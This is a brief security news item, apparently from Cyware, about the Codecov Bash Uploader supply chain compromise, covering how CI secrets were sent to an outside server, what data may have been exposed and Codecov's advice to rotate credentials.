Codecov, an online platform for measuring code coverage, discovered that a threat actor had compromised its platform and made some changes in its code repository. The first signs of this software supply chain attack were traced back to late January. The platform, which hosts code testing reports and statistics, has a customer base of 29,000 enterprises.

What has happened?

The unknown threat actor had compromised Codecov and modified its Bash Uploader script that exposed sensitive information in customers’ continuous integration environment.
  • The attackers started to target Bash Uploader on January 31, when they modified the script to deliver the info from the customers’ environment to a server outside Codecov’s infrastructure.
  • The attackers took advantage of an error in the process of creating Codecov’s Docker image. This allowed them to extract credentials protecting the modification done to the Bash Uploader script.
  • Originally, the script uploaded data from the ENV variable to Codecov's platform. After the modification, Bash Uploader was sending the info to an IP from Digital Ocean that was not managed by Codecov.

About the exported data 

According to Codecov, the attackers could have used the malicious version to export sensitive data that includes:
  • Any tokens, credentials, and keys passed through their CI runner accessible when the Bash Uploader script executes.
  • Any data stores, services, and application code that could be accessed via tokens, credentials, or keys.
  • The git remote details of repositories used by Bash Uploaders uploading their coverage to Codecov in CI.


Due to the potential security risks, Codecov recommends impacted users to re-roll their credentials, tokens, or keys present in the environment variables in the CI processes based on Bash Uploader. In addition, customers with the local version of the script must check if the attacker’s code added at line 525 exists and replace it with the new code immediately.

Cyware Publisher